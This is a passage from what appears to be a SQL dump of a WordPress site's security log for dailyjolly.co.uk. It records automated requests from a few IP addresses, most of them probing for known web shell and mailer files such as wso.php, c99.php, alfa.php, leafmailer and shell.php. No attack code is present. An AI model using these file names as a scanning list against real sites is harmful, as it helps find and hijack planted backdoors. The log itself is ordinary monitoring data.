EnCwD4bzPK37Wjp0','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('20.244.36.78',351544398,'',0,1674426507.3352,55,'JX4evmhqVf8NkO6aiS7djEIP','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.244.36.78',351544398,'',0,1674426508.1748,55,'3oaStYXF0gWjlI9ni8cvkGmC','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('20.244.36.78',351544398,'',0,1674426509.1750,55,'qoKHT319wGUtPFmxON7rcJAg','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('20.244.36.78',351544398,'',0,1674426510.1527,55,'OxPkWX08pQhV3eLTDIfbtw9a','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1674426511.0481,55,'lkhfmXbLeOGBqTWxIwD1ECS7','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('20.244.36.78',351544398,'',0,1674426511.9327,55,'0Y5tVpUkjP2HrKSFCN7lbRIs','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('20.244.36.78',351544398,'',0,1674426512.8526,55,'i4MS0HqfjAFxkwK6nGEZeN9g','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('20.244.36.78',351544398,'',0,1674426513.7547,55,'jsQGdYUS01Ewar6Fbh8Ov9Vi','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('20.244.36.78',351544398,'',0,1674426514.6325,55,'AHqun7yoC5PEZt1gUh9OMGFj','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('20.244.36.78',351544398,'',0,1674426515.5405,55,'K3gCzpJcli4Rq5V9jFfhUA2G','','19|0|0|0|www.dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('20.244.36.78',351544398,'',0,1674426516.4322,55,'utXlhsKZ8HNmiDbk3zcaURM7','','19|0|0|0|www.dailyjolly.co.uk/alf.php',0,19,0),('20.244.36.78',351544398,'',0,1674426517.3006,55,'Hz2YNkRbxVnM9XS5m6o7vdKw','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1674426518.1822,55,'9heRWjdo8aSAMtlXPONisxH3','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1674426519.0877,55,'sMZRdYV15iDOcb9LrgP0GSnW','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('20.244.36.78',351544398,'',0,1674426519.9682,55,'64ZlX28kSeaPhwqJMBYrKIUo','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('20.244.36.78',351544398,'',0,1674426520.8376,55,'viIQBLwDt56MXTqKF3r2yxOH','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1674426521.7285,55,'EoJ9jsmvMiOz4lxGfqkSFYgD','','19|0|0|0|www.dailyjolly.co.uk/kk.php',0,19,0),('20.244.36.78',351544398,'',0,1674426522.6105,55,'fwNSspqQLyonRO2CagXGzHUe','','19|0|0|0|www.dailyjolly.co.uk/mrjn.php',0,19,0),('20.244.36.78',351544398,'',0,1674426523.4762,55,'q1LJTYDeprkAlGOZfPbgUBhE','','19|0|0|0|www.dailyjolly.co.uk/kn.php',0,19,0),('20.244.36.78',351544398,'',0,1674426524.3941,55,'9Bxnzoi7dcsg6LvjybhqXOF2','','19|0|0|0|www.dailyjolly.co.uk/3301.php',0,19,0),('20.244.36.78',351544398,'',0,1674426525.3006,55,'XCZdJ3nbmHA15ywQORMVesIr','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674426526.1558,55,'OTunWtzMrDisqhcKZRFwPC9p','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1674426527.1030,55,'JLPqyv8ehB0FIolSt7f9rxkO','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674426528.0724,55,'JbeLBWGcnDvA73mp0qfjYEdS','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('20.244.36.78',351544398,'',0,1674426528.9804,55,'moOthPQJNxsnYg76MVAIu5eF','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('20.244.36.78',351544398,'',0,1674426529.8851,55,'nGHRbFVdIWU9O4KPS1wjpy7l','','19|0|0|0|www.dailyjolly.co.uk/wp-ad.php',0,19,0),('20.244.36.78',351544398,'',0,1674426530.7930,55,'i3f9pNmxzTABZ4wlLtRI2k7G','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.244.36.78',351544398,'',0,1674426531.6827,55,'McYP0VbsfwShlpKzBTUgG2AI','','19|0|0|0|www.dailyjolly.co.uk/.wp-cache.php',0,19,0),('20.244.36.78',351544398,'',0,1674426532.5635,55,'9QH1pSilX0E8UnkMWOcZL5so','','19|0|0|0|www.dailyjolly.co.uk/sendmail.php',0,19,0),('20.244.36.78',351544398,'',0,1674426533.5007,55,'slE48ROq3wbHn0zrjhM6dNyt','','19|0|0|0|www.dailyjolly.co.uk/rahma.php',0,19,0),('20.244.36.78',351544398,'',0,1674426534.4272,55,'y2pINge5BxV81LPA4zEjZCJ6','','19|0|0|0|www.dailyjolly.co.uk/nasgor.php',0,19,0),('20.244.36.78',351544398,'',0,1674426535.3528,55,'1V9806WO3ALXxSBbrnjKyQHu','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.244.36.78',351544398,'',0,1674426536.2091,55,'f7xIOpAnYT2WE6rbyBN0LMP8','','19|0|0|0|www.dailyjolly.co.uk/alfa123.php',0,19,0),('20.244.36.78',351544398,'',0,1674426537.0774,55,'5DOpL4w8NZsIET2iR9AY36mH','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('20.244.36.78',351544398,'',0,1674426537.9677,55,'ZmInXhwWeb23uRkKjfVdvDEq','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('20.244.36.78',351544398,'',0,1674426538.8185,55,'lsvVycrptRCKY38oz6ub1fJ0','','19|0|0|0|www.dailyjolly.co.uk/wp-one.php',0,19,0),('20.244.36.78',351544398,'',0,1674426539.6691,55,'Lf1SMBEqiGINHXlbQOVxdg3s','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('20.244.36.78',351544398,'',0,1674426540.6136,55,'veA3TptkXGa58ZKmyoxEinl2','','19|0|0|0|www.dailyjolly.co.uk/wso1337.php',0,19,0),('20.14.84.163',336483491,'',0,1674431382.0747,55,'14A30keWwPKgmj2HEtJbBc6l','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674431383.0044,55,'1GkUaroAqbjW8ORV4Tx3lguH','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431383.9680,55,'PlrXGRoUgEfpq3MVh4nyuL7m','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431384.9718,55,'6kZDdKOvWw5asCVuN3LpSGfT','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674431385.9095,55,'7jAmI6LONRokFT3BJM0C2pzX','','19|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431385.9776,10,'7jAmI6LONRokFT3BJM0C2pzX','','707|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,707,0),('20.14.84.163',336483491,'',0,1674431386.8928,55,'AeqVQjBmDXIiRKNuhWH6T3Ew','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431388.1679,55,'SZMH9vdquyj0rVUgtJeWXcl2','','19|0|0|0|www.dailyjolly.co.uk/wp-content/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674431389.1150,55,'cqUmryjFwaRQLeJp4sPAbTCl','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674431390.0862,55,'rLCQ1bBkSaTJAEIs5tpZ7mM3','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674431391.0340,55,'9rqVP8bmMBFGI75TveAfY0ya','','19|0|0|0|www.dailyjolly.co.uk/leaf-mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674431391.9505,55,'RiuxosEO9wqrSMQK1W2JzPfm','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674431392.8917,55,'x97j1SgiyDYuNIOfHRk8V3z5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674431393.8427,55,'zXQSlpex4MWNYTZdfcyVGi2B','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431394.9489,55,'VtAmM2h9osbqwP7nr4JuDfH5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/lf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431396.1125,55,'lhjsAc0r1yuI8QxC4nV2dBt3','','19|0|0|0|www.dailyjolly.co.uk/.tmb/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674431397.2218,55,'3tXbQTYIGCiH5jcxse7ayq6U','','19|0|0|0|www.dailyjolly.co.uk/mailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674431398.4925,55,'nNk6mbvgdB4LiswPrJRD8QS9','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.14.84.163',336483491,'',0,1674431399.4418,55,'Labo1BQqv39eTgX6KuxOWcIh','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.14.84.163',336483491,'',0,1674431400.4286,55,'OtD5UrFXQiAnE1jxmGNPTsvM','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.14.84.163',336483491,'',0,1674431401.3714,55,'HEZvDpRAeJl9Csi2tLUcbGr7','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.14.84.163',336483491,'',0,1674431402.3103,55,'Pac9yr8boq0TXfpwQgH72UMO','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.14.84.163',336483491,'',0,1674431403.2675,55,'kLghqR6swiKUCT1aN8pWQmDI','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.14.84.163',336483491,'',0,1674431404.1926,55,'xg2qTaNdpwZuF9zsQfeBM16b','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.14.84.163',336483491,'',0,1674431405.1330,55,'kvTKeSmJPYBsaO1CGjqXuMxi','','19|0|0|0|www.dailyjolly.co.uk/28.php',0,19,0),('20.14.84.163',336483491,'',0,1674431406.0666,55,'nJi1PEr46mVDM80qRNFdC75t','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('20.14.84.163',336483491,'',0,1674431407.0010,55,'ewzToNpa7sv4n2LUB5KuYglJ','','19|0|0|0|www.dailyjolly.co.uk/owl.php',0,19,0),('20.14.84.163',336483491,'',0,1674431407.9391,55,'eoV6JZCNHUR7wrdWjkS5FsYX','','19|0|0|0|www.dailyjolly.co.uk/wp-content/owl.php',0,19,0),('20.14.84.163',336483491,'',0,1674431408.9342,55,'UXQgmBaJOPWIVNZkTHod7SpE','','19|0|0|0|www.dailyjolly.co.uk/wp-maiiler.php',0,19,0),('20.14.84.163',336483491,'',0,1674431409.8667,55,'Yn0wI657m8jSPpeKLrXiqaxR','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.14.84.163',336483491,'',0,1674431410.7891,55,'QwdTy8rRq54E2eL0Mmj9hBnN','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('20.14.84.163',336483491,'',0,1674431411.7084,55,'C1LlFcNsWS8Q9aD7bOmBKMVx','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('20.203.135.203',348882891,'',0,1674435767.9336,55,'ykoExc9I3tqpbhNvAreRQGUn','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.203.135.203',348882891,'',0,1674435865.3118,55,'7lYWJNUrCp5aqTXxyjceDoEv','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.203.135.203',348882891,'',0,1674435944.7941,55,'YGdfumDri3qSeJ8AbO2E1B0w','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.203.135.203',348882891,'',0,1674436696.3809,55,'8tfPBvWR7LGAEQ4b1SszenVJ','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.203.135.203',348882891,'',0,1674436696.6973,55,'cegvQpitardhzYf218XDyFs3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.203.135.203',348882891,'',0,1674436696.7480,10,'cegvQpitardhzYf218XDyFs3','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.203.135.203',348882891,'',0,1674436779.3551,55,'fZw49Hs28oAJTyri0GYXxl3L','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.203.135.203',348882891,'',0,1674437102.3413,55,'hknUXyBZLVCudqW5aj7NQ6b0','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.203.135.203',348882891,'',0,1674437102.5883,55,'vpkbu58BzlhX3NK19CfrI7nJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.203.135.203',348882891,'',0,1674437144.7200,55,'kyzpdYfJu68XSZEKgTmDo41M','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.203.135.203',348882891,'',0,1674437161.7398,55,'J8f7g2NbYTuVwGCjQZriP9Fx','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.203.135.203',348882891,'',0,1674437989.1130,100,'XzHQ49Y5AWJojmZgeahkLD2c','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.203.135.203',348882891,'',0,1674438204.0111,55,'Eo2iRIMvAtwF6Vf7O9P4GmKb','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.203.135.203',348882891,'',0,1674438210.7728,55,'gYjCoRMZrJsPaT9wik42GEX7','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440240.2578,55,'QHutdDKirx6Ro7JNSVAYZ84L','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440241.0394,55,'W9AP6Y4sMcwNxoulRCjLGvyg','','19|0|0|0|dailyjolly.co.uk/xxx.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440241.5802,55,'fZjUi6woMKecSp92uLNFYl04','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440242.3164,55,'Gh07nYf5R8sbPHWSqIdOgC3A','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440242.9308,55,'8GrexXFmdwIVjiLR94un1abW','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440242.9559,10,'8GrexXFmdwIVjiLR94un1abW','','707|0|0|0|dailyjolly.co.uk/shell.php',0,707,0),('160.176.20.205',2695894221,'',0,1674440243.4728,55,'8qYvADGn7Fkryj51sZMK4gHx','','19|0|0|0|dailyjolly.co.uk/alpha.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440243.8898,55,'h8v1LNanGWDsM3lQ9OZYkfq7','','19|0|0|0|dailyjolly.co.uk/mailer.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440244.2920,55,'dISrnRxMbP1QtU0gyNWZEcV8','','19|0|0|0|dailyjolly.co.uk/send.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440244.6493,55,'7hLrQgiXzRl1vD0ZyPeHYWKx','','19|0|0|0|dailyjolly.co.uk/leaf.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440245.2295,55,'u4fxFXsA7BLVMg6jtryHnG0O','','19|0|0|0|dailyjolly.co.uk/leafmailer.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440245.5322,55,'d3sAb0DlUYO19SuBZfiREQno','','19|0|0|0|dailyjolly.co.uk/sender.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440246.0558,55,'U0tXNhbnCkYRLvp3DzFPoliE','','19|0|0|0|dailyjolly.co.uk/inbox.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440246.9305,55,'ok21FTrJ6BfeA7mzvyc4Vhxt','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440247.7210,55,'n9LsBbxiTmEHJhX0gIpVjC1a','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440248.0516,55,'DmJ7MwB9GzYULT2bxen0Ilar','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440248.7762,55,'7f8Zw1pRKt0LWkBhTP3D9nEO','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440249.8803,55,'Lcf8aQP1ygN9uKUwZ7rAmkHh','','19|0|0|0|dailyjolly.co.uk/test.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440250.3345,55,'kcYoAxUPinh3f9tl0m6gwvaD','','19|0|0|0|dailyjolly.co.uk/srx.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440250.8749,55,'JRKn3SPOkVTj4UHNIlwgFxZX','','19|0|0|0|dailyjolly.co.uk/1337.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440251.3917,55,'iMLZDRlv9UGW7yHwjJ32I04q','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440251.7897,55,'eszYG8At6olK7wQ9ZEWOkxbN','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440252.5705,55,'6AtRU8qPjzQOS7E0mvpG9wWf','','19|0|0|0|dailyjolly.co.uk/XxX.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440252.9502,55,'Mgpd8NzrwjfXVWtSQihYA1y7','','19|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440253.5652,55,'C9Rth2WVzu0A5IY7FymknxPs','','19|0|0|0|dailyjolly.co.uk/lf.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440254.0235,55,'s5M8XUz7FnLhVTNGPIDKywpj','','19|0|0|0|dailyjolly.co.uk/alex.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440254.5362,55,'I6gZDkN7Je2E9C0K8XSaoQzd','','19|0|0|0|dailyjolly.co.uk/marijuana.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440254.9424,55,'upza6j7C3lgknQKXwqvAfSrG','','19|0|0|0|dailyjolly.co.uk/gaza.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440255.2773,55,'Vpz3XTGx7tW6PHveoOrw2scm','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440255.8611,55,'0FBqeo8Pi2p3hORTaL5ZnuHX','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440256.3233,55,'PaKHXRGQJtEh6x1rZig5sFjn','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440256.8287,55,'z8lfOvMrs2HNCmDWycpxS1Fi','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440257.2929,55,'BMzueYrsZDxR0ojhwgUpNGLc','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440257.7197,55,'ceg9VyiAqRvSFBNHL6hD2WmP','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440258.2929,55,'dX5JbC2sEADYezjf7Flygi8B','','19|0|0|0|dailyjolly.co.uk/priv8.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440258.7953,55,'rHQMJNFCjSVqx0zUmiGy2gsd','','19|0|0|0|dailyjolly.co.uk/bb.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440259.1680,55,'MX71J30E2F6YPTihleWS5bUZ','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440259.7385,55,'LPEemSK9DYWN435Jz8FB2uhi','','19|0|0|0|dailyjolly.co.uk/Lux.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440260.2678,55,'UxYs6Al7nhVJe0tcHimuOGgw','','19|0|0|0|dailyjolly.co.uk/haxor.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440260.8860,55,'uEYTa6ImQU43phnxtZCyAbK5','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440261.3287,55,'TXkcnh8rMJl65x7VsoyEgR04','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440261.7817,55,'rARSMQeG0vwcsDqKdOTmHhEg','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440262.1562,55,'JFazEl8NkbKQx6sDihI4SmWA','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440262.5179,55,'xW40Kynp5mZSgTkD3wPtfjsz','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440262.9955,55,'J2G4gqkpl6WeXdmKjwZvM7fD','','19|0|0|0|dailyjolly.co.uk/xl.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440263.2967,55,'8r0fnZuvXaDoHpt63QqSiLJ9','','19|0|0|0|dailyjolly.co.uk/symlink.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440263.7470,55,'e7OVQLlhNo2wujB9X5irnTvR','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440264.1897,55,'OC17g2dWEziTIrnDaNx6RJ0L','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440264.6825,55,'drz2ptU5xqJyfujGEK1kS4iC','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440265.0947,55,'jfU3pC7I9q6AS4WuxwHNR1Js','','19|0|0|0|dailyjolly.co.uk/c99.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440265.5385,55,'RWDQPGS9VKNqpaZrhmyijIB5','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440266.1052,55,'AJ563nsyIruM1CoOpHS2jYm9','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440266.6358,55,'ghNOXlFCJVeEQjbmyx9Icion','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440267.2869,55,'4J6nkI8MiSlPUhE1Tz5pXv2O','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440267.6796,55,'fbrAvQSPOpuBsaqtIhX8UVJy','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440267.9989,55,'pn0h6fEsGibz95LKcmYXCPSj','','19|0|0|0|dailyjolly.co.uk/4.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440268.4691,55,'RCI96GlDNb0j8mMa2TFupriP','','19|0|0|0|dailyjolly.co.uk/5.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440268.9851,55,'KsDzpP0TE8VO5hImRtCgdWwl','','19|0|0|0|dailyjolly.co.uk/6.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440270.1887,55,'fVYPAdGToyts6QIe2bhKrCFX','','19|0|0|0|dailyjolly.co.uk/7.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440271.0835,55,'JRZDCBmKWd3i8aFMoQzknjIg','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440272.0220,55,'7U1lbVoJgceA50OELDKvmRBf','','19|0|0|0|dailyjolly.co.uk/9.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440272.5417,55,'hw9XZ8AVtMuWP1ki72zN3HE0','','19|0|0|0|dailyjolly.co.uk/10.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440273.1831,55,'6cOFs2p9UYMeGvCPmZ8JK7rA','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440273.6151,55,'QMPe2r9Cqhn31skN740FTEVb','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440274.1100,55,'RDkspHvw19ZPo3Uxad0SIfEX','','19|0|0|0|dailyjolly.co.uk/e.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440274.4459,55,'7QcVBFDuCfOyxvKEdUG5It8j','','19|0|0|0|dailyjolly.co.uk/r.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440274.9756,55,'KAkD97PzihUwQ2VgFGOumXxZ','','19|0|0|0|dailyjolly.co.uk/t.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440275.3669,55,'kU0ZNpzf3gL4eQ8Vlo5E6FSq','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440275.7641,55,'IkQ5sKgZLGmvOptHbjnoCarM','','19|0|0|0|dailyjolly.co.uk/u.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440276.2356,55,'cn0ePIowKDCaRLElmxYgtbi8','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440276.7736,55,'7lENXm4wtOoTjCGksedqgVbp','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440277.1523,55,'aE2RMS5IBoG8wLlPhibgdq7V','','19|0|0|0|dailyjolly.co.uk/p.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440277.5595,55,'fM1nkvZQHOK7raNR4Cuqjx0s','','19|0|0|0|dailyjolly.co.uk/q.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440278.0121,55,'SQDHGZMOcAwET9rIaRJnNKxh','','19|0|0|0|dailyjolly.co.uk/s.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440278.3715,55,'aXYCxZ62RbVMvySO80jdhHDz','','19|0|0|0|dailyjolly.co.uk/d.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440279.2681,55,'hKnVwelkEYozt3LjcyCGTM8H','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440280.0083,55,'BxGwR8s1bDKrLqNS7TYZfAke','','19|0|0|0|dailyjolly.co.uk/g.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440280.4058,55,'YEUmSFRhDIz25Vlrg6wTXJCW','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440280.8636,55,'9rB8p07LnObiKT5gu3WGSAqX','','19|0|0|0|dailyjolly.co.uk/j.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440281.4588,55,'8ZR5wOtSbPpl3N9F0KeqzCja','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440281.9090,55,'iz7EISJDfKxvoVPrWZg4FjyL','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440282.5661,55,'FN4p230seSgf7AuDbOTKkz5L','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440283.0918,55,'F46BarvD2AgbxpRLPCZVfqKs','','19|0|0|0|dailyjolly.co.uk/v.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440283.6185,55,'Vj7vcfJtQw5sIdmrL8gEPM3H','','19|0|0|0|dailyjolly.co.uk/n.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440283.9472,55,'mlQqeA0B7Z28a6SHxhNu3dKT','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440284.7134,55,'fDVK8pQRIWhovqP9YXJrsOEx','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440285.2076,55,'xgoHmPqrEV0vsiZpkLI1D5nd','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440285.6644,55,'AUdL9I4H7psG1jOSBwmvgRQD','','19|0|0|0|dailyjolly.co.uk/minimo.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440286.3461,55,'wMl7jd98eO